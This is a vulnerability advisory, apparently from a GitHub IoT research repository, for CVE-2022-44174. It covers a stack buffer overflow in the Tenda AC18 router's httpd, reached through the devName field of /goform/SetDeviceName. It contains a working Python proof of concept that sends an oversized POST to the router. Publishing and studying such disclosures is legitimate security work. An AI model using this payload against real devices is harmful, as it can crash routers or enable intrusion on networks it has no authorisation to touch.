CVE-2022-44174: IoT_vuln/Tenda_AC18_V15.03.05.05_Vuln_devName.md at main · RobinWang825/IoT_vuln

Permalink

Cannot retrieve contributors at this time

Tenda AC18(V15.03.05.05) has a Stack Buffer Overflow Vulnerability****Product

1. product information: https://www.tenda.com.cn/
2. firmware download: https://www.tenda.com.cn/download/detail-2610.html

Affected version

V15.03.05.05

Vulnerability

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetDeviceName function, which can be accessed through the URL goform/SetDeviceName.

In formSetDeviceName function, devName is controllable and will be passed into the local_1c parameter. Then local_1c will be spliced into acStack412 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

PoC

import socket import os li = lambda x : print(‘\x1b[01;38;5;214m’ + x + ‘\x1b[0m’) ll = lambda x : print(‘\x1b[01;38;5;1m’ + x + ‘\x1b[0m’) ip = ‘192.168.0.1’ port = 80 r = socket.socket(socket.AF_INET, socket.SOCK_STREAM) r.connect((ip, port)) rn = b’\r\n’ p1 = b’a’ * 0x300 p2 = b’devName=’ + p1 p3 = b"POST /goform/SetDeviceName" + b" HTTP/1.1" + rn p3 += b"Host: 192.168.0.1" + rn p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + rn p3 += b"Accept-Language: en-US,en;q=0.5" + rn p3 += b"Accept-Encoding: gzip, deflate" + rn p3 += b"Cookie: password=1111; curShow=; ac_login_info=passwork; test=A" + rn p3 += b"Connection: close" + rn p3 += b"Upgrade-Insecure-Requests: 1" + rn p3 += (b"Content-Length: %d" % len(p2)) +rn p3 += b’Content-Type: application/x-www-form-urlencoded’+rn p3 += rn p3 += p2

r.send(p3)

response = r.recv(4096) response = response.decode() li(response)